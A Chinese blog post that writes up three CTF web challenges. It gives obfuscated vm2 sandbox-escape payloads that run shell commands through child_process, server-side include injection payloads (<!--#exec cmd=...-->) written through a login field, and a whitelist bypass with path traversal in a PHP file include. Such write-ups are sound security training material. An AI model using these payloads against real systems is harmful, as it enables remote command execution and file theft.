<!DOCTYPE html>

<html lang="zh-CN">

<head>
  
  <title>第 五 周 write up [[HFCTF2020]JustEscape [BJDCTF2020]EasySearch HCTF-2018-Web-warmup] - tothemoon &#39; s blog</title>
  <meta charset="UTF-8">
  <meta name="description" content="">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5">
  
  

  <link rel="shortcut icon" href="https://gitee.com/tothemoon_2020/picgo/raw/master/img/20201005095528.jpeg" type="image/png" />
  <meta name="description" content="[HFCTF2020]JustEscape(VM沙箱逃逸)">
<meta property="og:type" content="article">
<meta property="og:title" content="第 五 周 write up [[HFCTF2020]JustEscape [BJDCTF2020]EasySearch HCTF-2018-Web-warmup]">
<meta property="og:url" content="http://tothemoon2019.github.io/2020/10/21/%E7%AC%AC%20%E4%BA%94%20%E5%91%A8%20write%20up%20[[HFCTF2020]JustEscape%20[BJDCTF2020]EasySearch%20HCTF-2018-Web-warmup]/index.html">
<meta property="og:site_name" content="tothemoon &#39; s blog">
<meta property="og:description" content="[HFCTF2020]JustEscape(VM沙箱逃逸)">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021121242505.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021121455745.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021122541132.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021153123221.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021192944903.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021193000057.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021193723152.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021194120442.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021194519667.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021194805828.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021195736157.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022181159131.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022204426148.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022211028510.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022211049335.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022211235212.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022211547266.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022212826658.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022213312814.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022213445120.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022213908743.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201023085801340.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201023085910436.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNDc4MDk2,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020102309173117.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201023104355103.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNDc4MDk2,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020102310470939.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNDc4MDk2,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201023104736955.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNDc4MDk2,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201023104942729.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNDc4MDk2,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201023105315106.png#pic_center">
<meta property="article:published_time" content="2020-10-21T12:06:32.000Z">
<meta property="article:modified_time" content="2020-11-06T13:47:14.702Z">
<meta property="article:author" content="tothemoon">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021121242505.png">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/combine/gh/nexmoe/nexmoe.github.io@latest/css/style.css,npm/highlight.js@9.15.8/styles/atom-one-dark.css,gh/nexmoe/nexmoe.github.io@latest/lib/mdui_043tiny/css/mdui.css,gh/nexmoe/nexmoe.github.io@latest/lib/iconfont/iconfont.css" crossorigin>
  
  <!--<link rel="stylesheet" href="/css/style.css?v=1604670505457">-->

  
<meta name="generator" content="Hexo 5.2.0"></head>

<body class="mdui-drawer-body-left">
  
  <div id="nexmoe-background">
    <div class="nexmoe-bg" style="background-image: url(https://gitee.com/tothemoon_2020/picgo/raw/master/img-ba40e8db67f132e43f5473e1bf736787.jpg)"></div>
    <div class="mdui-appbar mdui-shadow-0">
      <div class="mdui-toolbar">
        <a mdui-drawer="{target: '#drawer', swipe: true}" title="menu" class="mdui-btn mdui-btn-icon mdui-ripple"><i class="mdui-icon nexmoefont icon-menu"></i></a>
        <div class="mdui-toolbar-spacer"></div>
        <!--<a href="javascript:;" class="mdui-btn mdui-btn-icon"><i class="mdui-icon material-icons">search</i></a>-->
        <a href="/" title="tothemoon" class="mdui-btn mdui-btn-icon"><img src="https://gitee.com/tothemoon_2020/picgo/raw/master/20201016111730.png" alt="tothemoon"></a>
       </div>
    </div>
  </div>
  <div id="nexmoe-header">
      <div class="nexmoe-drawer mdui-drawer" id="drawer">
    <div class="nexmoe-avatar mdui-ripple">
        <a href="/" title="tothemoon">
            <img src="https://gitee.com/tothemoon_2020/picgo/raw/master/20201016111730.png" alt="tothemoon" alt="tothemoon">
        </a>
    </div>
    <div class="nexmoe-count">
        <div><span>文章</span>6</div>
        <div><span>标签</span>0</div>
        <div><span>分类</span>3</div>
    </div>
    <div class="nexmoe-list mdui-list" mdui-collapse="{accordion: true}">
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/" title="回到首页">
            <i class="mdui-list-item-icon nexmoefont icon-home"></i>
            <div class="mdui-list-item-content">
                回到首页
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/archives" title="文章归档">
            <i class="mdui-list-item-icon nexmoefont icon-container"></i>
            <div class="mdui-list-item-content">
                文章归档
            </div>
        </a>
        
    </div>
    <aside id="nexmoe-sidebar">
  
  <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-search">
        <form id="search_form" action_e="https://www.baidu.com/search?q=site:tothemoon2019.github.io" onsubmit="return search();">
            <label><input id="search_value" name="q" type="search" placeholder="搜索"></label>
        </form>
    </div>
</div>
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">社交按钮</h3>
    <div class="nexmoe-widget nexmoe-social">
        <a class="mdui-ripple" href="https://space.bilibili.com/28841207" target="_blank" mdui-tooltip="{content: '哔哩哔哩'}" style="color: rgb(231, 106, 141);background-color: rgba(231, 106, 141, .15);">
            <i class="nexmoefont icon-bilibili"></i>
        </a><a class="mdui-ripple" href="https://github.com/tothemoon2019" target="_blank" mdui-tooltip="{content: 'GitHub'}" style="color: rgb(0，0，0);background-color: rgba(25,23,23,.1);">
            <i class="nexmoefont icon-github"></i>
        </a><a class="mdui-ripple" href="https://steamcommunity.com/profiles/76561198234182404/" target="_blank" mdui-tooltip="{content: 'steam'}" style="color: rgb(25, 23, 23);background-color: rgba(14,71,161,.1);">
            <i class="nexmoefont icon-steam"></i>
        </a><a class="mdui-ripple" href="https://www.zhihu.com/people/beezhu-zou" target="_blank" mdui-tooltip="{content: '知乎'}" style="color: color:#1e88e5;background-color: rgba(0, 0, 255, .15);">
            <i class="nexmoefont icon-zhihu"></i>
        </a><a class="mdui-ripple" href="https://blog.csdn.net/qq_43478096" target="_blank" mdui-tooltip="{content: 'csdn'}" style="color: color:#1e88e5;background-color: rgba(0, 0, 255, .15);">
            <i class="nexmoefont https://csdnimg.cn/public/favicon.ico"></i>
        </a>
    </div>
</div>
  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章分类</h3>
    <div class="nexmoe-widget">

      <ul class="category-list">

        


        

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/AWD/">AWD</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/ctf/">ctf</a>
          <span class="category-list-count">4</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/杂项/">杂项</a>
          <span class="category-list-count">1</span>
        </li>

        
      </ul>

    </div>
  </div>


  
  
  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章归档</h3>
    <div class="nexmoe-widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/11/">十一月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/10/">十月 2020</a></li></ul>
    </div>
  </div>


  
</aside>
    <div class="nexmoe-copyright">
        &copy; 2020 tothemoon
        Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
        & <a href="https://nexmoe.com/hexo-theme-nexmoe.html" target="_blank">Nexmoe</a>
    </div>
</div><!-- .nexmoe-drawer -->
  </div>
  <div id="nexmoe-content">
    <div class="nexmoe-primary">
        <div class="nexmoe-post">
  
      <div class="nexmoe-post-cover" style="padding-bottom: 20%;"> 
          <img data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/20201106211949.png" data-sizes="auto" alt="第 五 周 write up [[HFCTF2020]JustEscape [BJDCTF2020]EasySearch HCTF-2018-Web-warmup]" class="lazyload">
          <h1>第 五 周 write up [[HFCTF2020]JustEscape [BJDCTF2020]EasySearch HCTF-2018-Web-warmup]</h1>
      </div>
  
  
  <div class="nexmoe-post-meta nexmoe-rainbow" style="margin:10px 0!important;">
    <a><i class="nexmoefont icon-calendar-fill"></i>2020年10月21日</a>
    <a><i class="nexmoefont icon-areachart"></i>1.8k 字</a>
    <a><i class="nexmoefont icon-time-circle-fill"></i>大概 8 分钟</a>
</div>

  <div class="nexmoe-post-right">
    
      <div class="nexmoe-fixed">
        <div class="nexmoe-valign">
            <div class="nexmoe-toc">
                <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#HFCTF2020-JustEscape-VM%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8"><span class="toc-number">1.</span> <span class="toc-text">[HFCTF2020]JustEscape(VM沙箱逃逸)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00"><span class="toc-number">1.1.</span> <span class="toc-text">0x00</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01"><span class="toc-number">1.2.</span> <span class="toc-text">0x01</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1"><span class="toc-number">1.2.1.</span> <span class="toc-text">1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2"><span class="toc-number">1.2.2.</span> <span class="toc-text">2</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#success"><span class="toc-number">1.3.</span> <span class="toc-text">success</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#BJDCTF2020-EasySearch-shtml-ssi%E6%B3%A8%E5%85%A5"><span class="toc-number">2.</span> <span class="toc-text">[BJDCTF2020]EasySearch(shtml,ssi注入)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#ssi%E6%B3%A8%E5%85%A5"><span class="toc-number">2.1.</span> <span class="toc-text">ssi注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#success-1"><span class="toc-number">2.2.</span> <span class="toc-text">success</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#HCTF-2018-Web-warmup-%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="toc-number">3.</span> <span class="toc-text">HCTF-2018-Web-warmup(代码审计)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#success-2"><span class="toc-number">3.1.</span> <span class="toc-text">success</span></a></li></ol></li></ol>
            </div>
        </div>
      </div>
    
  </div>

  <article>
    <h1 id="HFCTF2020-JustEscape-VM沙箱逃逸"><a href="#HFCTF2020-JustEscape-VM沙箱逃逸" class="headerlink" title="[HFCTF2020]JustEscape(VM沙箱逃逸)"></a>[HFCTF2020]JustEscape(VM沙箱逃逸)</h1><a id="more"></a>

<p>页面打开后有一堆相当于提示的东西：<code>目录下肯定有个run.php</code>，<code>注意编码</code>，<code>真的是php嘛</code></p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021121242505.png" alt="image-20201021121242505" class="lazyload"></p>
<p>打开run.php发现一段代码</p>
<pre><code class="php">&lt;?php
if( array_key_exists( &quot;code&quot;, $_GET ) &amp;&amp; $_GET[ &#39;code&#39; ] != NULL ) &#123;
    $code = $_GET[&#39;code&#39;];
    echo eval(code);
&#125; else &#123;
    highlight_file(__FILE__);
&#125;
?&gt;</code></pre>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021121455745.png" alt="image-20201021121455745" class="lazyload"></p>
<h2 id="0x00"><a href="#0x00" class="headerlink" title="0x00"></a>0x00</h2><p>其一注意编码：这里应该是将code后面的数学运算式经过url编码后才能正确运行。</p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021122541132.png" alt="image-20201021122541132" class="lazyload"></p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021153123221.png" alt="image-20201021122729516" class="lazyload"></p>
<h2 id="0x01"><a href="#0x01" class="headerlink" title="0x01"></a>0x01</h2><p>考虑到提示，又由于eval()函数不仅仅是php含有的，Node.js也有这个函数。于是用<code>Errot().stack</code>测试，页面回显了一堆错误报错。</p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021192944903.png" alt="image-20201021192944903" class="lazyload"></p>
<p>根据这些报错，应该可以确认是vm沙箱逃逸<br>在这里面有最新的沙箱逃逸的poc。<br><a target="_blank" rel="noopener" href="https://github.com/patriksimek/vm2/issues/225">https://github.com/patriksimek/vm2/issues/225</a><br>但是直接用的话，应该会被waf拦截</p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021193000057.png" alt="image-20201021193000057" class="lazyload"></p>
<p>经过探测，发现wafu过滤掉了一下的关键字。</p>
<pre><code>[&#39;for&#39;, &#39;while&#39;, &#39;process&#39;, &#39;exec&#39;, &#39;eval&#39;, &#39;constructor&#39;, &#39;prototype&#39;, &#39;Function&#39;, &#39;+&#39;, &#39;&quot;&#39;,&#39;&#39;&#39;]</code></pre>
<p>这时可以利用一下两种方式绕过：</p>
<h3 id="1"><a href="#1" class="headerlink" title="1"></a>1</h3><p>官方write up给出的是在关键字字母上加上 ` 比如：<img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021193723152.png" alt="image-20201021193723152" class="lazyload"></p>
<p>然后将poc里的whoami改为cat /flag的url编码<img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021194120442.png" alt="image-20201021194120442" class="lazyload"></p>
<p>payload:</p>
<pre><code>/run.php?code=(()=%3E&#123;%20TypeError[[`p`,`r`,`o`,`t`,`o`,`t`,`y`,`p`,`e`][`join`](``)][`a`]%20=%20f=%3Ef[[`c`,`o`,`n`,`s`,`t`,`r`,`u`,`c`,`t`,`o`,`r`][`join`](``)]([`r`,`e`,`t`,`u`,`r`,`n`,`%20`,`p`,`r`,`o`,`c`,`e`,`s`,`s`][`join`](``))();%20try&#123;%20Object[`preventExtensions`](Buffer[`from`](``))[`a`]%20=%201;%20&#125;catch(e)&#123;%20return%20e[`a`](()=%3E&#123;&#125;)[`mainModule`][[`r`,`e`,`q`,`u`,`i`,`r`,`e`][`join`](``)]([`c`,`h`,`i`,`l`,`d`,`_`,`p`,`r`,`o`,`c`,`e`,`s`,`s`][`join`](``))[[`e`,`x`,`e`,`c`,`S`,`y`,`n`,`c`][`join`](``)](`cat+%2fflag`)[`toString`]();%20&#125;%20&#125;)()</code></pre>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021194519667.png" alt="image-20201021194519667" class="lazyload"></p>
<h3 id="2"><a href="#2" class="headerlink" title="2"></a>2</h3><p>另一种方法是将关键字（比如prototyp）改为：<code>$&#123;</code>${<code>prototyp</code>}e<code>&#125;</code></p>
<p>payload：</p>
<pre><code>(function ()&#123;
    TypeError[`$&#123;`$&#123;`prototyp`&#125;e`&#125;`][`$&#123;`$&#123;`get_proces`&#125;s`&#125;`] = f=&gt;f[`$&#123;`$&#123;`constructo`&#125;r`&#125;`](`$&#123;`$&#123;`return this.proces`&#125;s`&#125;`)();
    try&#123;
        Object.preventExtensions(Buffer.from(``)).a = 1;
    &#125;catch(e)&#123;
        return e[`$&#123;`$&#123;`get_proces`&#125;s`&#125;`](()=&gt;&#123;&#125;).mainModule[`$&#123;`$&#123;`requir`&#125;e`&#125;`](`$&#123;`$&#123;`child_proces`&#125;s`&#125;`)[`$&#123;`$&#123;`exe`&#125;cSync`&#125;`](`cat /flag`).toString();
    &#125;
&#125;)()</code></pre>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021194805828.png" alt="image-20201021194805763" class="lazyload"></p>
<h2 id="success"><a href="#success" class="headerlink" title="success"></a>success</h2><p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201021195736157.png" alt="image-20201021195736157" class="lazyload"></p>
<p><br><br><br><br><br><br></p>
<h1 id="BJDCTF2020-EasySearch-shtml-ssi注入"><a href="#BJDCTF2020-EasySearch-shtml-ssi注入" class="headerlink" title="[BJDCTF2020]EasySearch(shtml,ssi注入)"></a>[BJDCTF2020]EasySearch(shtml,ssi注入)</h1><p>测试了一下常见的sql注入，没有回显。</p>
<p>于是用御剑扫了一下后台</p>
<p>扫描出了一个index的备份文件：<code>index.php.swp</code></p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022181159131.png" alt="image-20201022181159131" class="lazyload"></p>
<pre><code class="php">&lt;?php
    ob_start(); // 打开输出控制缓冲
    function get_hash()&#123;
        $chars = &#39;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&amp;*()+-&#39;;
        $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
        $content = uniqid().$random; //生成一个ID
        return sha1($content); 
    &#125;
    header(&quot;Content-Type: text/html;charset=utf-8&quot;);
    ***
    if(isset($_POST[&#39;username&#39;]) and $_POST[&#39;username&#39;] != &#39;&#39; )
    &#123;
        $admin = &#39;6d0bc1&#39;;
        if ( $admin == substr(md5($_POST[&#39;password&#39;]),0,6)) &#123; // 截断 0到6  用python写脚本爆出md加密前六位为admin的数字
            echo &quot;&lt;script&gt;alert(&#39;[+] Welcome to manage system&#39;)&lt;/script&gt;&quot;;
            $file_shtml = &quot;public/&quot;.get_hash().&quot;.shtml&quot;; // 调用函数
            $shtml = fopen($file_shtml, &quot;w&quot;) or die(&quot;Unable to open file!&quot;);
            $text = &#39;
            ***
            ***
            &lt;h1&gt;Hello,&#39;.$_POST[&#39;username&#39;].&#39;&lt;/h1&gt;
            ***
            ***&#39;;
            fwrite($shtml,$text);
            fclose($shtml);
            ***
            echo &quot;[!] Header  error ...&quot;;
        &#125; else &#123;
            echo &quot;&lt;script&gt;alert(&#39;[!] Failed&#39;)&lt;/script&gt;&quot;;

    &#125;else
    &#123;
    ***
    &#125;
    ***
?&gt;</code></pre>
<p>用python写脚本爆出md加密前六位为$admin的数</p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022204426148.png" alt="image-20201022204426148" class="lazyload"></p>
<pre><code class="python">import hashlib
def md5(str):
    m = hashlib.md5()
    m.update(str.encode(&quot;utf8&quot;))
    # print(m.hexdigest())
    return m.hexdigest()  
if __name__ == &#39;__main__&#39;:
    flag = &#39;6d0bc1&#39;
    for i in range(0, 100000000000):
        if flag == md5(str(i))[0:6]:
            print(i)</code></pre>
<p>登陆成功后回显了一个url连接</p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022211028510.png" alt="image-20201022211028510" class="lazyload"></p>
<p>访问之</p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022211049335.png" alt="image-20201022211049335" class="lazyload"></p>
<h2 id="ssi注入"><a href="#ssi注入" class="headerlink" title="ssi注入"></a>ssi注入</h2><p>感觉没啥有用的，再百度了下shtml漏洞，发现有ssi注入。</p>
<p>当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用语法执行命令。</p>
<p>使用SSI(Server Side Include)的html文件扩展名，SSI（Server Side Include)，通常称为”服务器端嵌入”或者叫”服务器端包含”，是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。</p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022211235212.png" alt="image-20201022211235212" class="lazyload"></p>
<p>把username改为<code>&lt;!--#exec cmd=&quot;id&quot; --&gt;</code>，这样就会把这个写入到这个shtml文件里面，出现以下回显就说明，存在ssi注入。</p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022211547266.png" alt="image-20201022211547266" class="lazyload"></p>
<p>然后构造payload找flag</p>
<p>找了根目录下没有</p>
<p>payload：<code>&lt;!--#exec cmd=&quot;ls /&quot;</code></p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022212826658.png" alt="image-20201022212826658" class="lazyload"></p>
<p>又不是连木马，感觉flag应该好找，看看上一级目录。 </p>
<p>payload：<code>&lt;!--#exec cmd=&quot;ls ../&quot;</code></p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022213312814.png" alt="image-20201022213312814" class="lazyload"></p>
<p>打开flag_990c66bf85a09c664f0b6741840499b2</p>
<p>payload：<code>&lt;!--#exec cmd=&quot;cat ../flag_990c66bf85a09c664f0b6741840499b2&quot;</code></p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022213445120.png" alt="image-20201022213445120" class="lazyload"></p>
<h2 id="success-1"><a href="#success-1" class="headerlink" title="success"></a>success</h2><p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201022213908743.png" alt="image-20201022213908743" class="lazyload"></p>
<p><br><br><br><br><br><br><br></p>
<h1 id="HCTF-2018-Web-warmup-代码审计"><a href="#HCTF-2018-Web-warmup-代码审计" class="headerlink" title="HCTF-2018-Web-warmup(代码审计)"></a>HCTF-2018-Web-warmup(代码审计)</h1><p>查看源码，访问source.php<br><img data-sizes="auto" data-src="https://img-blog.csdnimg.cn/20201023085801340.png#pic_center" alt="在这里插入图片描述" class="lazyload"><br>发现有源码<br><img data-sizes="auto" data-src="https://img-blog.csdnimg.cn/20201023085910436.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNDc4MDk2,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述" class="lazyload"></p>
<pre><code class="php">&lt;?php
    highlight_file(__FILE__);
    class emmm
    &#123;
        public static function checkFile(&amp;$page)
        &#123;
            $whitelist = [&quot;source&quot;=&gt;&quot;source.php&quot;,&quot;hint&quot;=&gt;&quot;hint.php&quot;];
            if (! isset($page) || !is_string($page)) &#123; // 判断变量是否存在且为字符串类型
                echo &quot;you can&#39;t see it&quot;;
                return false;
            &#125;

            if (in_array($page, $whitelist)) &#123; // 检测变量里是否有白名单里的元素
                return true;
            &#125;

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . &#39;?&#39;, &#39;?&#39;) // 查找？在字符串里出现的首个位置返回id
            );
            if (in_array($_page, $whitelist)) &#123;
                return true;
            &#125;

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . &#39;?&#39;, &#39;?&#39;)
            );
            if (in_array($_page, $whitelist)) &#123;
                return true;
            &#125;
            echo &quot;you can&#39;t see it&quot;;
            return false;
        &#125;
    &#125;

    if (! empty($_REQUEST[&#39;file&#39;]) // $_REQUEST[&#39;file&#39;]值非空
        &amp;&amp; is_string($_REQUEST[&#39;file&#39;]) // $_REQUEST[&#39;file&#39;]值为字符串
        &amp;&amp; emmm::checkFile($_REQUEST[&#39;file&#39;]) //不为空，字符串，函数返回1
    ) &#123;
        include $_REQUEST[&#39;file&#39;];
        exit;
    &#125; else &#123;
        echo &quot;&lt;br&gt;&lt;img src=\&quot;https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\&quot; /&gt;&quot;;
    &#125;  
?&gt;
</code></pre>
<p>源码里发现有一个hint.php访问之，有一个提示，flag in ffffllllaaaagggg<br><img data-sizes="auto" data-src="https://img-blog.csdnimg.cn/2020102309173117.png#pic_center" alt="在这里插入图片描述" class="lazyload"><br>知道flag的名称后就可以开始构造payload读取了，<br>经过代码审计后最重要的是要通过checkFile里的判断返回<code>true</code>；checkfile里面一共有三个判断可以返回true，进而读取flag。不过呢，并不是每一个都是有用的。<br>first：</p>
<pre><code>if (in_array($page, $whitelist)) &#123; // 检测变量里是否有白名单里的元素
                return true;
            &#125;
</code></pre>
<p>second：</p>
<pre><code>            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . &#39;?&#39;, &#39;?&#39;) // 查找？在字符串里出现的首个位置返回id
            );
            if (in_array($_page, $whitelist)) &#123;
                return true;
            &#125;</code></pre>
<p>last：</p>
<pre><code>            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . &#39;?&#39;, &#39;?&#39;)
            );
            if (in_array($_page, $whitelist)) &#123;
                return true;
            &#125;</code></pre>
<p>其中第一个没啥用，因为它直接就对<code>$page</code>与whitelist比较，这样的话能通过的情况就只有当<code>$page</code>为source.php或hint.php。<br>第二种和第三种区别在于第三种对<code>page</code>进行了一次url解码。<br>所以第二种和第三种都能构造出payload读取flag。<br>payload1：<br>为了让运实现函数in_array()时，能比较成功，就得让mb_substr()函数截断的时候只留下hint.php或source.php，所以可以在他们后面加上?再接上flag比如：file=hint.php?ffffllllaaaagggg。<br>可是却会出现滑稽<br>    <img data-sizes="auto" data-src="https://img-blog.csdnimg.cn/20201023104355103.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNDc4MDk2,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述" class="lazyload"></p>
<pre><code>为什么呢？因为浏览器在进行解析的时候会自动url解码一次，所以我们得先url编码一次
payload：file=hint.php%3fffffllllaaaagggg</code></pre>
<p><img data-sizes="auto" data-src="https://img-blog.csdnimg.cn/2020102310470939.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNDc4MDk2,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述" class="lazyload"></p>
<p>为什么还是出不了flag？可能是路径不正确，所以我们一级一级查看，最后：payload：file=hint.php%3f../../../../../ffffllllaaaagggg<br><img data-sizes="auto" data-src="https://img-blog.csdnimg.cn/20201023104736955.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNDc4MDk2,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述" class="lazyload"><br>payload2：<br>第三个判断前面又解码了一次，所以我们编码两次：payload：file=hint.php%253f../../../../../ffffllllaaaagggg；不用编码直接用？也是可行的。<br><img data-sizes="auto" data-src="https://img-blog.csdnimg.cn/20201023104942729.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNDc4MDk2,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述" class="lazyload"></p>
